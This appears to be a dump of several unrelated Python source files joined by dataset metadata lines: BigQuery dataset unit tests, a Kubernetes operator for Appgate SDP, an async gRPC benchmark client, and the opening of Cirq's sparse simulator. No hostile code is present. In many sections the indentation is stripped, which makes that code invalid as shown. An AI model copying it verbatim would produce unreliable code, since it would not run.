'friendlyName': TITLE,
}
self.assertEqual(req['data'], SENT)
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_update_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DEF_TABLE_EXP = 12345
LOCATION = 'EU'
RESOURCE = self._makeResource()
RESOURCE['defaultTableExpirationMs'] = 12345
RESOURCE['location'] = LOCATION
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.default_table_expiration_ms = DEF_TABLE_EXP
dataset.location = LOCATION
dataset.update(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'PUT')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
'defaultTableExpirationMs': 12345,
'location': 'EU',
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_delete_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.delete()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'DELETE')
self.assertEqual(req['path'], '/%s' % PATH)
def test_delete_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection({})
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.delete(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'DELETE')
self.assertEqual(req['path'], '/%s' % PATH)
def test_list_tables_empty(self):
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
tables, token = dataset.list_tables()
self.assertEqual(tables, [])
self.assertIsNone(token)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
PATH = 'projects/%s/datasets/%s/tables' % (self.PROJECT, self.DS_NAME)
self.assertEqual(req['path'], '/%s' % PATH)
def test_list_tables_defaults(self):
from google.cloud.bigquery.table import Table
TABLE_1 = 'table_one'
TABLE_2 = 'table_two'
PATH = 'projects/%s/datasets/%s/tables' % (self.PROJECT, self.DS_NAME)
TOKEN = 'TOKEN'
DATA = {
'nextPageToken': TOKEN,
'tables': [
{'kind': 'bigquery#table',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_1),
'tableReference': {'tableId': TABLE_1,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
{'kind': 'bigquery#table',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_2),
'tableReference': {'tableId': TABLE_2,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
]
}
conn = _Connection(DATA)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
tables, token = dataset.list_tables()
self.assertEqual(len(tables), len(DATA['tables']))
for found, expected in zip(tables, DATA['tables']):
self.assertIsInstance(found, Table)
self.assertEqual(found.table_id, expected['id'])
self.assertEqual(found.table_type, expected['type'])
self.assertEqual(token, TOKEN)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
def test_list_tables_explicit(self):
from google.cloud.bigquery.table import Table
TABLE_1 = 'table_one'
TABLE_2 = 'table_two'
PATH = 'projects/%s/datasets/%s/tables' % (self.PROJECT, self.DS_NAME)
TOKEN = 'TOKEN'
DATA = {
'tables': [
{'kind': 'bigquery#dataset',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_1),
'tableReference': {'tableId': TABLE_1,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
{'kind': 'bigquery#dataset',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_2),
'tableReference': {'tableId': TABLE_2,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
]
}
conn = _Connection(DATA)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
tables, token = dataset.list_tables(max_results=3, page_token=TOKEN)
self.assertEqual(len(tables), len(DATA['tables']))
for found, expected in zip(tables, DATA['tables']):
self.assertIsInstance(found, Table)
self.assertEqual(found.table_id, expected['id'])
self.assertEqual(found.table_type, expected['type'])
self.assertIsNone(token)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self.assertEqual(req['query_params'],
{'maxResults': 3, 'pageToken': TOKEN})
def test_table_wo_schema(self):
from google.cloud.bigquery.table import Table
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
table = dataset.table('table_name')
self.assertIsInstance(table, Table)
self.assertEqual(table.name, 'table_name')
self.assertIs(table._dataset, dataset)
self.assertEqual(table.schema, [])
def test_table_w_schema(self):
from google.cloud.bigquery.schema import SchemaField
from google.cloud.bigquery.table import Table
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
full_name = SchemaField('full_name', 'STRING', mode='REQUIRED')
age = SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table('table_name', schema=[full_name, age])
self.assertIsInstance(table, Table)
self.assertEqual(table.name, 'table_name')
self.assertIs(table._dataset, dataset)
self.assertEqual(table.schema, [full_name, age])
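# Test doubles for the cases above: _Client simply records the project and
# connection it was built with; _Connection records every api_request() call
# and replays its canned responses in FIFO order, raising NotFound once they
# are exhausted.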
class _Client(object):
def __init__(self, project='project', connection=None):
self.project = project
self.connection = connection
class _Connection(object):
def __init__(self, *responses):
self._responses = responses
self._requested = []
def api_request(self, **kw):
from google.cloud.exceptions import NotFound
self._requested.append(kw)
try:
response, self._responses = self._responses[0], self._responses[1:]
        except IndexError:
raise NotFound('miss')
else:
return response
| 39.541296
| 79
| 0.619107
|
aef3b62ef9c04b3a695f887af68d3c3f2f6e7b0c
| 19,772
|
py
|
Python
|
appgate/appgate.py
|
appgate/sdp-operator
|
289927e07eca84003aa4bd4631b57dc9955eee23
|
[
"MIT"
] | 6
|
2020-09-22T13:21:05.000Z
|
2022-01-06T01:49:22.000Z
|
appgate/appgate.py
|
appgate/sdp-operator
|
289927e07eca84003aa4bd4631b57dc9955eee23
|
[
"MIT"
] | 36
|
2020-09-23T06:38:51.000Z
|
2022-02-09T13:53:32.000Z
|
appgate/appgate.py
|
appgate/sdp-operator
|
289927e07eca84003aa4bd4631b57dc9955eee23
|
[
"MIT"
] | 3
|
2021-07-27T18:16:52.000Z
|
2022-03-01T22:18:15.000Z
|
import asyncio
import base64
import binascii
import logging
import os
import sys
import tempfile
from asyncio import Queue
from contextlib import AsyncExitStack
from copy import deepcopy
from pathlib import Path
from typing import Optional, Type, Dict, Callable, Any, FrozenSet, Tuple, Iterable, List, Set
import threading
from attr import attrib, attrs
from kubernetes.client.rest import ApiException
from typedload.exceptions import TypedloadTypeError
from kubernetes.config import load_kube_config, list_kube_config_contexts, load_incluster_config
from kubernetes.client import CustomObjectsApi
from kubernetes.watch import Watch
from appgate.attrs import K8S_LOADER, dump_datetime
from appgate.client import AppgateClient, K8SConfigMapClient, entity_unique_id
from appgate.openapi.types import AppgateException
from appgate.openapi.openapi import generate_api_spec, generate_api_spec_clients, SPEC_DIR
from appgate.openapi.types import APISpec, Entity_T, K8S_APPGATE_VERSION, K8S_APPGATE_DOMAIN, \
APPGATE_METADATA_LATEST_GENERATION_FIELD, APPGATE_METADATA_MODIFICATION_FIELD
from appgate.openapi.utils import is_target, APPGATE_TARGET_TAGS_ENV, BUILTIN_TAGS, APPGATE_EXCLUDE_TAGS_ENV, \
APPGATE_BUILTIN_TAGS_ENV, has_tag
from appgate.secrets import k8s_get_secret
from appgate.state import AppgateState, create_appgate_plan, \
appgate_plan_apply, EntitiesSet, entities_conflict_summary, resolve_appgate_state
from appgate.types import K8SEvent, AppgateEvent, EntityWrapper, EventObject, OperatorArguments
__all__ = [
'init_kubernetes',
'main_loop',
'get_context',
'get_current_appgate_state',
'start_entity_loop',
'Context',
'log',
'exclude_appgate_entities',
]
USER_ENV = 'APPGATE_OPERATOR_USER'
PASSWORD_ENV = 'APPGATE_OPERATOR_PASSWORD'
PROVIDER_ENV = 'APPGATE_OPERATOR_PROVIDER'
DEVICE_ID_ENV = 'APPGATE_OPERATOR_DEVICE_ID'
TIMEOUT_ENV = 'APPGATE_OPERATOR_TIMEOUT'
HOST_ENV = 'APPGATE_OPERATOR_HOST'
DRY_RUN_ENV = 'APPGATE_OPERATOR_DRY_RUN'
CLEANUP_ENV = 'APPGATE_OPERATOR_CLEANUP'
NAMESPACE_ENV = 'APPGATE_OPERATOR_NAMESPACE'
TWO_WAY_SYNC_ENV = 'APPGATE_OPERATOR_TWO_WAY_SYNC'
SPEC_DIR_ENV = 'APPGATE_OPERATOR_SPEC_DIRECTORY'
APPGATE_SECRETS_KEY = 'APPGATE_OPERATOR_FERNET_KEY'
APPGATE_CONFIGMAP_ENV = 'APPGATE_OPERATOR_CONFIG_MAP'
APPGATE_SSL_NO_VERIFY = 'APPGATE_OPERATOR_SSL_NO_VERIFY'
APPGATE_SSL_CACERT = 'APPGATE_OPERATOR_CACERT'
crds: Optional[CustomObjectsApi] = None
log = logging.getLogger('appgate-operator')
log.setLevel(logging.INFO)
def get_crds() -> CustomObjectsApi:
global crds
if not crds:
crds = CustomObjectsApi()
return crds
@attrs()
class Context:
namespace: str = attrib()
user: str = attrib()
password: str = attrib()
provider: str = attrib()
controller: str = attrib()
two_way_sync: bool = attrib()
timeout: int = attrib()
dry_run_mode: bool = attrib()
cleanup_mode: bool = attrib()
api_spec: APISpec = attrib()
metadata_configmap: str = attrib()
# target tags if specified tells which entities do we want to work on
target_tags: Optional[FrozenSet[str]] = attrib(default=None)
# builtin tags are the entities that we consider builtin
builtin_tags: FrozenSet[str] = attrib(default=BUILTIN_TAGS)
# exclude tags if specified tells which entities do we want to exclude
exclude_tags: Optional[FrozenSet[str]] = attrib(default=None)
no_verify: bool = attrib(default=True)
cafile: Optional[Path] = attrib(default=None)
device_id: Optional[str] = attrib(default=None)
def save_cert(cert: str) -> Path:
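    # Note: tempfile.mktemp() only reserves a file name and is race-prone;
    # tempfile.NamedTemporaryFile(delete=False) would be a safer alternative here.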
cert_path = Path(tempfile.mktemp())
with cert_path.open('w') as f:
if cert.startswith('-----BEGIN CERTIFICATE-----'):
f.write(cert)
else:
bytes_decoded: bytes = base64.b64decode(cert)
f.write(bytes_decoded.decode())
return cert_path
def get_tags(args: OperatorArguments) -> Iterable[Optional[FrozenSet[str]]]:
tags: List[Optional[FrozenSet[str]]] = []
    for tags_arg, tags_env in [(args.target_tags, APPGATE_TARGET_TAGS_ENV),
                               (args.exclude_tags, APPGATE_EXCLUDE_TAGS_ENV),
                               (args.builtin_tags, APPGATE_BUILTIN_TAGS_ENV)]:
        xs = frozenset(tags_arg) if tags_arg else frozenset()
        # Materialize the env-var tags so the truthiness check below is meaningful
        # (a bare filter object would always be truthy).
        ys = frozenset(filter(None, os.getenv(tags_env, '').split(',')))
        ts = None
        if xs or ys:
            ts = xs.union(ys)
        tags.append(ts)
return tags
def get_context(args: OperatorArguments,
k8s_get_secret: Optional[Callable[[str, str], str]] = None) -> Context:
namespace = args.namespace or os.getenv(NAMESPACE_ENV)
if not namespace:
raise AppgateException('Namespace must be defined in order to run the appgate-operator')
user = os.getenv(USER_ENV) or args.user
password = os.getenv(PASSWORD_ENV) or args.password
provider = os.getenv(PROVIDER_ENV) or args.provider
device_id = os.getenv(DEVICE_ID_ENV) or args.device_id
controller = os.getenv(HOST_ENV) or args.host
timeout = os.getenv(TIMEOUT_ENV) or args.timeout
two_way_sync = os.getenv(TWO_WAY_SYNC_ENV) or ('1' if args.two_way_sync else '0')
dry_run_mode = os.getenv(DRY_RUN_ENV) or ('1' if args.dry_run else '0')
cleanup_mode = os.getenv(CLEANUP_ENV) or ('1' if args.cleanup else '0')
spec_directory = os.getenv(SPEC_DIR_ENV) or args.spec_directory or SPEC_DIR
no_verify = os.getenv(APPGATE_SSL_NO_VERIFY, '0') == '1' or args.no_verify
appgate_cacert = os.getenv(APPGATE_SSL_CACERT)
appgate_cacert_path = None
verify = not no_verify
if verify and appgate_cacert:
try:
appgate_cacert_path = save_cert(appgate_cacert)
except (binascii.Error, binascii.Incomplete) as e:
            raise AppgateException(f'[get-context] Unable to decode the certificate provided: {e}')
log.debug(f'[get_context] Saving certificate in {appgate_cacert_path}')
elif verify and args.cafile:
appgate_cacert_path = args.cafile
secrets_key = os.getenv(APPGATE_SECRETS_KEY)
target_tags, exclude_tags, builtin_tags = get_tags(args)
metadata_configmap = args.metadata_configmap or f'{namespace}-configmap'
if not user or not password or not controller:
missing_envs = ','.join([x[0]
for x in [(USER_ENV, user),
(PASSWORD_ENV, password),
(HOST_ENV, controller)]
if x[1] is None])
raise AppgateException(f'Unable to create appgate-controller context, missing: {missing_envs}')
api_spec = generate_api_spec(spec_directory=Path(spec_directory) if spec_directory else None,
secrets_key=secrets_key,
k8s_get_secret=k8s_get_secret)
return Context(namespace=namespace, user=user, password=password,
provider=provider,
device_id=device_id,
controller=controller, timeout=int(timeout),
dry_run_mode=dry_run_mode == '1',
cleanup_mode=cleanup_mode == '1',
two_way_sync=two_way_sync == '1',
api_spec=api_spec,
no_verify=no_verify,
target_tags=target_tags if target_tags else None,
builtin_tags=builtin_tags if builtin_tags else BUILTIN_TAGS,
exclude_tags=exclude_tags if exclude_tags else None,
metadata_configmap=metadata_configmap,
cafile=appgate_cacert_path)
def init_kubernetes(args: OperatorArguments) -> Context:
if 'KUBERNETES_PORT' in os.environ:
load_incluster_config()
# TODO: Discover it somehow
# https://github.com/kubernetes-client/python/issues/363
namespace = args.namespace or os.getenv(NAMESPACE_ENV)
else:
load_kube_config()
namespace = args.namespace or os.getenv(NAMESPACE_ENV) or list_kube_config_contexts()[1]['context'].get('namespace')
if not namespace:
raise AppgateException('Unable to discover namespace, please provide it.')
ns: str = namespace # lambda thinks it's an Optional
return get_context(
args=args,
k8s_get_secret=lambda secret, key: k8s_get_secret(
namespace=ns,
key=key,
secret=secret
))
def exclude_appgate_entities(entities: List[Entity_T], target_tags: Optional[FrozenSet[str]],
exclude_tags: Optional[FrozenSet[str]]) -> Set[EntityWrapper]:
"""
    Filter out entities according to target_tags and exclude_tags.
    Returns the entities that are members of target_tags (all entities if None)
    but not members of exclude_tags.
"""
return set(filter(lambda e: is_target(e, target_tags) and not has_tag(e, exclude_tags),
[EntityWrapper(e) for e in entities]))
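# Illustrative usage sketch (hypothetical entities and tags, not part of the
# original module):
#   wrapped = exclude_appgate_entities(entities,
#                                      target_tags=frozenset({'k8s'}),
#                                      exclude_tags=frozenset({'builtin'}))
# keeps only the entities tagged 'k8s' that are not also tagged 'builtin'.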
async def get_current_appgate_state(ctx: Context) -> AppgateState:
"""
Gets the current AppgateState for controller
"""
api_spec = ctx.api_spec
log.info('[appgate-operator/%s] Updating current state from controller',
ctx.namespace)
if ctx.no_verify:
log.warning('[appgate-operator/%s] Ignoring SSL certificates!',
ctx.namespace)
if ctx.device_id is None:
raise AppgateException('No device id specified')
async with AppgateClient(controller=ctx.controller, user=ctx.user,
password=ctx.password, provider=ctx.provider,
device_id=ctx.device_id,
version=api_spec.api_version,
no_verify=ctx.no_verify,
cafile=ctx.cafile) as appgate_client:
if not appgate_client.authenticated:
log.error('[appgate-operator/%s] Unable to authenticate with controller',
ctx.namespace)
raise AppgateException('Error authenticating')
entity_clients = generate_api_spec_clients(api_spec=api_spec,
appgate_client=appgate_client)
entities_set = {}
for entity, client in entity_clients.items():
entities = await client.get()
if entities is not None:
entities_set[entity] = EntitiesSet(
exclude_appgate_entities(entities, ctx.target_tags, ctx.exclude_tags))
if len(entities_set) < len(entity_clients):
log.error('[appgate-operator/%s] Unable to get entities from controller',
ctx.namespace)
raise AppgateException('Error reading current state')
appgate_state = AppgateState(entities_set=entities_set)
return appgate_state
def run_entity_loop(ctx: Context, crd: str, loop: asyncio.AbstractEventLoop,
queue: Queue[AppgateEvent],
load: Callable[[Dict[str, Any], Optional[Dict[str, Any]], type], Entity_T],
entity_type: type, singleton: bool, k8s_configmap_client: K8SConfigMapClient):
namespace = ctx.namespace
log.info(f'[{crd}/{namespace}] Loop for {crd}/{namespace} started')
watcher = Watch().stream(get_crds().list_namespaced_custom_object, K8S_APPGATE_DOMAIN,
K8S_APPGATE_VERSION, namespace, crd)
while True:
try:
data = next(watcher)
data_obj = data['object']
data_mt = data_obj['metadata']
kind = data_obj['kind']
spec = data_obj['spec']
event = EventObject(metadata=data_mt, spec=spec, kind=kind)
if singleton:
name = 'singleton'
else:
name = event.spec['name']
if event:
ev = K8SEvent(data['type'], event)
try:
# names are not unique between entities so we need to come up with a unique name
# now
mt = ev.object.metadata
latest_entity_generation = k8s_configmap_client.read_entity_generation(entity_unique_id(kind, name))
if latest_entity_generation:
mt[APPGATE_METADATA_LATEST_GENERATION_FIELD] = latest_entity_generation.generation
mt[APPGATE_METADATA_MODIFICATION_FIELD] = dump_datetime(latest_entity_generation.modified)
entity = load(ev.object.spec, ev.object.metadata, entity_type)
except TypedloadTypeError:
log.exception('[%s/%s] Unable to parse event %s', crd, namespace, event)
continue
log.debug('[%s/%s] K8SEvent type: %s: %s', crd, namespace, ev.type, entity)
asyncio.run_coroutine_threadsafe(queue.put(AppgateEvent(op=ev.type, entity=entity)),
loop)
except ApiException:
log.exception('[appgate-operator/%s] Error when subscribing events in k8s for %s',
namespace, crd)
sys.exit(1)
except Exception:
log.exception('[appgate-operator/%s] Unhandled error for %s', namespace, crd)
sys.exit(1)
async def start_entity_loop(ctx: Context, crd: str, entity_type: Type[Entity_T],
singleton: bool, queue: Queue[AppgateEvent],
k8s_configmap_client: K8SConfigMapClient) -> None:
log.debug('[%s/%s] Starting loop event for entities on path: %s', crd, ctx.namespace,
crd)
def run(loop: asyncio.AbstractEventLoop) -> None:
t = threading.Thread(target=run_entity_loop,
args=(ctx, crd, loop, queue, K8S_LOADER.load, entity_type, singleton,
k8s_configmap_client),
daemon=True)
t.start()
await asyncio.to_thread(run, asyncio.get_event_loop()) # type: ignore
async def main_loop(queue: Queue, ctx: Context, k8s_configmap_client: K8SConfigMapClient) -> None:
namespace = ctx.namespace
log.info('[appgate-operator/%s] Main loop started:', namespace)
log.info('[appgate-operator/%s] + namespace: %s', namespace, namespace)
log.info('[appgate-operator/%s] + host: %s', namespace, ctx.controller)
log.info('[appgate-operator/%s] + timeout: %s', namespace, ctx.timeout)
log.info('[appgate-operator/%s] + dry-run: %s', namespace, ctx.dry_run_mode)
log.info('[appgate-operator/%s] + cleanup: %s', namespace, ctx.cleanup_mode)
log.info('[appgate-operator/%s] + two-way-sync: %s', namespace, ctx.two_way_sync)
log.info('[appgate-operator/%s] Getting current state from controller',
namespace)
current_appgate_state = await get_current_appgate_state(ctx=ctx)
if ctx.cleanup_mode:
expected_appgate_state = AppgateState(
{k: v.entities_with_tags(ctx.builtin_tags) for k, v in current_appgate_state.entities_set.items()})
else:
expected_appgate_state = deepcopy(current_appgate_state)
log.info('[appgate-operator/%s] Ready to get new events and compute a new plan',
namespace)
while True:
try:
event: AppgateEvent = await asyncio.wait_for(queue.get(), timeout=ctx.timeout)
            log.info('[appgate-operator/%s] Event op: %s %s with name %s', namespace,
event.op, str(type(event.entity)), event.entity.name)
expected_appgate_state.with_entity(EntityWrapper(event.entity), event.op, current_appgate_state)
except asyncio.exceptions.TimeoutError:
# Log all entities in expected state
log.info('[appgate-operator/%s] Expected entities:', namespace)
for entity_type, xs in expected_appgate_state.entities_set.items():
for entity_name, e in xs.entities_by_name.items():
log.info('[appgate-operator/%s] %s: %s: %s', namespace, entity_type, entity_name,
e.id)
# Resolve entities now, in order
# this will be the Topological sort
total_conflicts = resolve_appgate_state(appgate_state=expected_appgate_state,
reverse=False,
api_spec=ctx.api_spec)
if total_conflicts:
log.error('[appgate-operator/%s] Found errors in expected state and plan can'
' not be applied.', namespace)
entities_conflict_summary(conflicts=total_conflicts, namespace=namespace)
log.info('[appgate-operator/%s] Waiting for more events that can fix the state.',
namespace)
continue
if ctx.two_way_sync:
# use current appgate state from controller instead of from memory
current_appgate_state = await get_current_appgate_state(ctx=ctx)
# Create a plan
# Need to copy?
# Now we use dicts so resolving update the contents of the keys
plan = create_appgate_plan(current_appgate_state, expected_appgate_state,
ctx.builtin_tags,)
if plan.needs_apply:
log.info('[appgate-operator/%s] No more events for a while, creating a plan',
namespace)
async with AsyncExitStack() as exit_stack:
appgate_client = None
if not ctx.dry_run_mode:
if ctx.device_id is None:
raise AppgateException('No device id specified')
appgate_client = await exit_stack.enter_async_context(AppgateClient(
controller=ctx.controller,
user=ctx.user, password=ctx.password, provider=ctx.provider,
device_id=ctx.device_id,
version=ctx.api_spec.api_version, no_verify=ctx.no_verify,
cafile=ctx.cafile))
else:
log.warning('[appgate-operator/%s] Running in dry-mode, nothing will be created',
namespace)
new_plan = await appgate_plan_apply(appgate_plan=plan, namespace=namespace,
entity_clients=generate_api_spec_clients(
api_spec=ctx.api_spec,
appgate_client=appgate_client)
if appgate_client else {},
k8s_configmap_client=k8s_configmap_client,
api_spec=ctx.api_spec)
if len(new_plan.errors) > 0:
log.error('[appgate-operator/%s] Found errors when applying plan:', namespace)
for err in new_plan.errors:
log.error('[appgate-operator/%s] Error %s:', namespace, err)
sys.exit(1)
if appgate_client:
current_appgate_state = new_plan.appgate_state
expected_appgate_state = expected_appgate_state.sync_generations()
else:
log.info('[appgate-operator/%s] Nothing changed! Keeping watching!', namespace)
| 48.342298
| 124
| 0.624671
|
5f4bbbdba6a262ea1be61f528fac8cd9dd11baf0
| 3,051
|
py
|
Python
|
test/test_client_aio.py
|
tsangpozheng/asyncgrpc
|
79ba732ab74d15ad02ef94763259298554198899
|
[
"MIT"
] | 2
|
2018-11-06T04:43:06.000Z
|
2018-12-05T09:20:02.000Z
|
test/test_client_aio.py
|
tsangpozheng/asyncgrpc
|
79ba732ab74d15ad02ef94763259298554198899
|
[
"MIT"
] | null | null | null |
test/test_client_aio.py
|
tsangpozheng/asyncgrpc
|
79ba732ab74d15ad02ef94763259298554198899
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('.')
sys.path.append('../pybase/')
import logging
import asyncio
from aiogrpc import Channel
from protos import benchmark_pb2
from protos import benchmark_pb2_grpc
messages = [
benchmark_pb2.HelloRequest(name='First'),
benchmark_pb2.HelloRequest(name='Second'),
benchmark_pb2.HelloRequest(name='3'),
benchmark_pb2.HelloRequest(name='4'),
]
def generate_messages():
for msg in messages:
print("Sending %s" % (msg.name))
yield msg
async def generate_messages_async():
for msg in messages:
await asyncio.sleep(1)
print("Sending async %s" % (msg.name))
yield msg
async def test(stub):
responses = await stub.SayHelloSS(generate_messages())
async for response in responses:
print("Received SS %s" % (response.message))
responses = await stub.SayHelloSS(generate_messages_async())
async for response in responses:
print("Received async SS %s" % (response.message))
response = await stub.SayHelloSU(generate_messages())
print("Received SU %s" % (response.message))
response = await stub.SayHelloSU(generate_messages_async())
print("Received async SU %s" % (response.message))
responses = await stub.SayHelloUS(benchmark_pb2.HelloRequest(name='im US'))
async for response in responses:
print("Received US %s" % (response.message))
response = await stub.SayHelloUU(benchmark_pb2.HelloRequest(name='im UU'))
print("Received UU %s" % (response.message))
async def test0(stub):
responses = await stub.SayHelloSS(generate_messages())
async for response in responses:
print("Received SS %s" % (response.message))
responses = await stub.SayHelloSS(generate_messages_async())
async for response in responses:
print("Received SS %s" % (response.message))
async def atest(stub):
await test(stub)
await test(stub)
logging.basicConfig(level=logging.INFO)
stub = benchmark_pb2_grpc.GreeterStub(Channel('127.0.0.1:5001'))
async def bench():
for i in range(2000):
responses = await stub.SayHelloSS(generate_messages())
async for response in responses:
print("Received SS %s" % (response.message))
response = await stub.SayHelloSU(generate_messages())
print("Received SU %s" % (response.message))
responses = await stub.SayHelloUS(
benchmark_pb2.HelloRequest(name='im US'))
async for response in responses:
print("Received US %s" % (response.message))
response = await stub.SayHelloUU(
benchmark_pb2.HelloRequest(name='im UU'))
print("Received UU %s" % (response.message))
def run():
loop = asyncio.get_event_loop()
t1 = asyncio.ensure_future(test(stub))
t2 = asyncio.ensure_future(test(stub))
loop.run_until_complete(asyncio.wait([t1, t2]))
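# Note: the second run() definition below replaces the one above, so only the
# bench() coroutine is actually executed when this script is run.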
def run():
loop = asyncio.get_event_loop()
loop.run_until_complete(bench())
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
run()
| 27.736364
| 79
| 0.678466
|
899a539a5233a4feb2e6c981ea34962902f225de
| 20,820
|
py
|
Python
|
cirq/sim/sparse_simulator.py
|
aditya-giri/Cirq
|
e5af689f184c8c5ccd9c076b2907a444b2479629
|
[
"Apache-2.0"
] | null | null | null |
cirq/sim/sparse_simulator.py
|
aditya-giri/Cirq
|
e5af689f184c8c5ccd9c076b2907a444b2479629
|
[
"Apache-2.0"
] | null | null | null |
cirq/sim/sparse_simulator.py
|
aditya-giri/Cirq
|
e5af689f184c8c5ccd9c076b2907a444b2479629
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simulator that uses numpy's einsum or sparse matrix operations."""
import collections
from typing import Dict, Iterator, List, Tuple, Type, TYPE_CHECKING
import numpy as np
from cirq import circuits, linalg, ops, protocols, qis, study, value
from cirq.sim import simulator, wave_function, wave_function_simulator
if TYPE_CHECKING:
import cirq
class _FlipGate(ops.SingleQubitGate):
"""A unitary gate that flips the |0> state with another state.
Used by `Simulator` to reset a qubit.
"""
def __init__(self, dimension: int, reset_value: int):
assert 0 < reset_value < dimension
self.dimension = dimension
self.reset_value = reset_value
def _qid_shape_(self) -> Tuple[int, ...]:
return (self.dimension,)
def _apply_unitary_(self, args: 'protocols.ApplyUnitaryArgs') -> np.ndarray:
        args.available_buffer[..., 0] = args.target_tensor[..., self.reset_value]
        args.available_buffer[..., self.reset_value] = args.target_tensor[..., 0]
return args.available_buffer
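# For a qubit (dimension=2, reset_value=1) _FlipGate swaps |0> and |1>, i.e. it
# behaves like a Pauli-X gate; higher dimensions swap |0> with |reset_value>.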
# Mutable named tuple to hold state and a buffer.
class _StateAndBuffer():
def __init__(self, state, buffer):
self.state = state
self.buffer = buffer
class Simulator(simulator.SimulatesSamples,
wave_function_simulator.SimulatesIntermediateWaveFunction):
"""A sparse matrix wave function simulator that uses numpy.
This simulator can be applied on circuits that are made up of operations
that have a `_unitary_` method, or `_has_unitary_` and
`_apply_unitary_`, `_mixture_` methods, are measurements, or support a
`_decompose_` method that returns operations satisfying these same
conditions. That is to say, the operations should follow the
`cirq.SupportsConsistentApplyUnitary` protocol, the `cirq.SupportsUnitary`
protocol, the `cirq.SupportsMixture` protocol, or the
`cirq.CompositeOperation` protocol. It is also permitted for the circuit
to contain measurements which are operations that support
`cirq.SupportsChannel` and `cirq.SupportsMeasurementKey`
This simulator supports three types of simulation.
Run simulations which mimic running on actual quantum hardware. These
simulations do not give access to the wave function (like actual hardware).
There are two variations of run methods, one which takes in a single
(optional) way to resolve parameterized circuits, and a second which
takes in a list or sweep of parameter resolver:
run(circuit, param_resolver, repetitions)
run_sweep(circuit, params, repetitions)
The simulation performs optimizations if the number of repetitions is
greater than one and all measurements in the circuit are terminal (at the
end of the circuit). These methods return `TrialResult`s which contain both
the measurement results, but also the parameters used for the parameterized
circuit operations. The initial state of a run is always the all 0s state
in the computational basis.
By contrast the simulate methods of the simulator give access to the
wave function of the simulation at the end of the simulation of the circuit.
These methods take in two parameters that the run methods do not: a
qubit order and an initial state. The qubit order is necessary because an
ordering must be chosen for the kronecker product (see
`SparseSimulationTrialResult` for details of this ordering). The initial
state can be either the full wave function, or an integer which represents
the initial state of being in a computational basis state for the binary
representation of that integer. Similar to run methods, there are two
simulate methods that run for single runs or for sweeps across different
parameters:
simulate(circuit, param_resolver, qubit_order, initial_state)
simulate_sweep(circuit, params, qubit_order, initial_state)
The simulate methods in contrast to the run methods do not perform
repetitions. The result of these simulations is a
`SparseSimulationTrialResult` which contains, in addition to measurement
results and information about the parameters that were used in the
    simulation, access to the state via the `state` method and `StateVectorMixin`
methods.
If one wishes to perform simulations that have access to the
wave function as one steps through running the circuit there is a generator
which can be iterated over and each step is an object that gives access
to the wave function. This stepping through a `Circuit` is done on a
`Moment` by `Moment` manner.
simulate_moment_steps(circuit, param_resolver, qubit_order,
initial_state)
One can iterate over the moments via
        for step_result in simulate_moment_steps(circuit):
# do something with the wave function via step_result.state
